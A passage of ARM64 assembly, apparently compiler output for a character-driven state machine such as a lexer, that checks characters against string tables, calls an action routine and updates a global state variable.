l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #8 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_45: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_48 b LBB1_46 LBB1_46: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_48 b LBB1_47 LBB1_47: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.8@PAGE add x1, x1, l_.str.8@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_48: b LBB1_257 LBB1_49: ldursb w0, [x29, #-1] adrp x1, _strx26@PAGE add x1, x1, _strx26@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_52 b LBB1_50 LBB1_50: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_52 b LBB1_51 LBB1_51: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_52: b LBB1_257 LBB1_53: ldursb w0, [x29, #-1] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_56 b LBB1_54 LBB1_54: ldursb w0, [x29, #-2] adrp x1, _strx21@PAGE add x1, x1, _strx21@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_56 b LBB1_55 LBB1_55: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #11 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_56: ldursb w0, [x29, #-1] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_59 b LBB1_57 LBB1_57: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_59 b LBB1_58 LBB1_58: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #24 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_59: b LBB1_257 LBB1_60: ldursb w0, [x29, #-1] adrp x1, _strx21@PAGE add x1, x1, _strx21@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_63 b LBB1_61 LBB1_61: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_63 b LBB1_62 LBB1_62: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_63: b LBB1_257 LBB1_64: ldursb w0, [x29, #-1] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_67 b LBB1_65 LBB1_65: ldursb w0, [x29, #-2] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_67 b LBB1_66 LBB1_66: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #13 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_67: ldursb w0, [x29, #-1] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_70 b LBB1_68 LBB1_68: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_70 b LBB1_69 LBB1_69: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_70: b LBB1_257 LBB1_71: ldursb w0, [x29, #-1] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_74 b LBB1_72 LBB1_72: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_74 b LBB1_73 LBB1_73: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_74: b LBB1_257 LBB1_75: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_78 b LBB1_76 LBB1_76: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_78 b LBB1_77 LBB1_77: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #14 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_78: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_81 b LBB1_79 LBB1_79: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_81 b LBB1_80 LBB1_80: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_81: b LBB1_257 LBB1_82: ldursb w0, [x29, #-1] adrp x1, _strx11@PAGE add x1, x1, _strx11@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_85 b LBB1_83 LBB1_83: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_85 b LBB1_84 LBB1_84: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #14 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_85: b LBB1_257 LBB1_86: ldursb w0, [x29, #-1] adrp x1, _strx4@PAGE add x1, x1, _strx4@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_89 b LBB1_87 LBB1_87: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_89 b LBB1_88 LBB1_88: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #17 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_89: b LBB1_257 LBB1_90: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_93 b LBB1_91 LBB1_91: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_93 b LBB1_92 LBB1_92: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #17 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_93: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_96 b LBB1_94 LBB1_94: ldursb w0, [x29, #-2] adrp x1, _strx4@PAGE add x1, x1, _strx4@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_96 b LBB1_95 LBB1_95: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #18 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_96: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_99 b LBB1_97 LBB1_97: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_99 b LBB1_98 LBB1_98: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #17 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_99: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_102 b LBB1_100 LBB1_100: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_102 b LBB1_101 LBB1_101: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.11@PAGE add x1, x1, l_.str.11@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_102: b LBB1_257 LBB1_103: ldursb w0, [x29, #-1] adrp x1, _strx4@PAGE add x1, x1, _strx4@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_106 b LBB1_104 LBB1_104: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_106 b LBB1_105 LBB1_105: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.12@PAGE add x1, x1, l_.str.12@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_106: b LBB1_257 LBB1_107: ldursb w0, [x29, #-1] adrp x1, _strx0@PAGE add x1, x1, _strx0@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_110 b LBB1_108 LBB1_108: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_110 b LBB1_109 LBB1_109: ldursb w2, [x29, #-1] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_110: ldursb w0, [x29, #-1] adrp x1, _strx2@PAGE add x1, x1, _strx2@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_113 b LBB1_111 LBB1_111: ldursb w0, [x29, #-2] adrp x1, _strx2@PAGE add x1, x1, _strx2@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_113 b LBB1_112 LBB1_112: ldursb w2, [x29, #-1] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_113: ldursb w0, [x29, #-1] adrp x1, _strx3@PAGE add x1, x1, _strx3@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_116 b LBB1_114 LBB1_114: ldursb w0, [x29, #-2] adrp x1, _strx4@PAGE add x1, x1, _strx4@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_116 b LBB1_115 LBB1_115: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #16 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_116: ldursb w0, [x29, #-1] adrp x1, _strx6@PAGE add x1, x1, _strx6@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_119 b LBB1_117 LBB1_117: ldursb w0, [x29, #-2] adrp x1, _strx7@PAGE add x1, x1, _strx7@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_119 b LBB1_118 LBB1_118: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #7 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_119: ldursb w0, [x29, #-1] adrp x1, _strx7@PAGE add x1, x1, _strx7@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_122 b LBB1_120 LBB1_120: ldursb w0, [x29, #-2] adrp x1, _strx9@PAGE add x1, x1, _strx9@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_122 b LBB1_121 LBB1_121: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #27 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_122: ldursb w0, [x29, #-1] adrp x1, _strx7@PAGE add x1, x1, _strx7@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_125 b LBB1_123 LBB1_123: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_125 b LBB1_124 LBB1_124: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_125: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_128 b LBB1_126 LBB1_126: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_128 b LBB1_127 LBB1_127: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #22 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_128: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_131 b LBB1_129 LBB1_129: ldursb w0, [x29, #-2] adrp x1, _strx11@PAGE add x1, x1, _strx11@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_131 b LBB1_130 LBB1_130: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #15 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_131: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_134 b LBB1_132 LBB1_132: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_134 b LBB1_133 LBB1_133: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_134: ldursb w0, [x29, #-1] adrp x1, _strx12@PAGE add x1, x1, _strx12@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_137 b LBB1_135 LBB1_135: ldursb w0, [x29, #-2] adrp x1, _strx13@PAGE add x1, x1, _strx13@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_137 b LBB1_136 LBB1_136: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #1 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_137: ldursb w0, [x29, #-1] adrp x1, _strx12@PAGE add x1, x1, _strx12@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_140 b LBB1_138 LBB1_138: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_140 b LBB1_139 LBB1_139: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.17@PAGE add x1, x1, l_.str.17@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_140: ldursb w0, [x29, #-1] adrp x1, _strx19@PAGE add x1, x1, _strx19@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_143 b LBB1_141 LBB1_141: ldursb w0, [x29, #-2] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_143 b LBB1_142 LBB1_142: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #10 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_143: ldursb w0, [x29, #-1] adrp x1, _strx22@PAGE add x1, x1, _strx22@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_146 b LBB1_144 LBB1_144: ldursb w0, [x29, #-2] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_146 b LBB1_145 LBB1_145: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #6 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_146: ldursb w0, [x29, #-1] adrp x1, _strx2@PAGE add x1, x1, _strx2@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_149 b LBB1_147 LBB1_147: ldursb w0, [x29, #-2] adrp x1, _strx22@PAGE add x1, x1, _strx22@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_149 b LBB1_148 LBB1_148: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #21 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_149: ldursb w0, [x29, #-1] adrp x1, _strx24@PAGE add x1, x1, _strx24@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_152 b LBB1_150 LBB1_150: ldursb w0, [x29, #-2] adrp x1, _strx22@PAGE add x1, x1, _strx22@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_152 b LBB1_151 LBB1_151: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #21 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_152: ldursb w0, [x29, #-1] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_155 b LBB1_153 LBB1_153: ldursb w0, [x29, #-2] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_155 b LBB1_154 LBB1_154: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #12 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_155: ldursb w0, [x29, #-1] adrp x1, _strx25@PAGE add x1, x1, _strx25@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_158 b LBB1_156 LBB1_156: ldursb w0, [x29, #-2] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_158 b LBB1_157 LBB1_157: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #20 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_158: ldursb w0, [x29, #-1] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_161 b LBB1_159 LBB1_159: ldursb w0, [x29, #-2] adrp x1, _strx20@PAGE add x1, x1, _strx20@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_161 b LBB1_160 LBB1_160: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #23 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_161: ldursb w0, [x29, #-1] adrp x1, _strx26@PAGE add x1, x1, _strx26@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_164 b LBB1_162 LBB1_162: ldursb w0, [x29, #-2] adrp x1, _strx27@PAGE add x1, x1, _strx27@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_164 b LBB1_163 LBB1_163: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #9 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_164: ldursb w0, [x29, #-1] adrp x1, _strx26@PAGE add x1, x1, _strx26@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_167 b LBB1_165 LBB1_165: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_167 b LBB1_166 LBB1_166: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_167: ldursb w0, [x29, #-1] adrp x1, _strx4@PAGE add x1, x1, _strx4@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_170 b LBB1_168 LBB1_168: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_170 b LBB1_169 LBB1_169: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #26 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_170: ldursb w0, [x29, #-1] adrp x1, _strx29@PAGE add x1, x1, _strx29@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_173 b LBB1_171 LBB1_171: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_173 b LBB1_172 LBB1_172: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.18@PAGE add x1, x1, l_.str.18@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_173: ldursb w0, [x29, #-1] adrp x1, _strx30@PAGE add x1, x1, _strx30@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_176 b LBB1_174 LBB1_174: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_176 b LBB1_175 LBB1_175: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.19@PAGE add x1, x1, l_.str.19@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_176: b LBB1_257 LBB1_177: ldursb w0, [x29, #-1] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_180 b LBB1_178 LBB1_178: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_180 b LBB1_179 LBB1_179: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_180: b LBB1_257 LBB1_181: ldursb w0, [x29, #-1] adrp x1, _strx22@PAGE add x1, 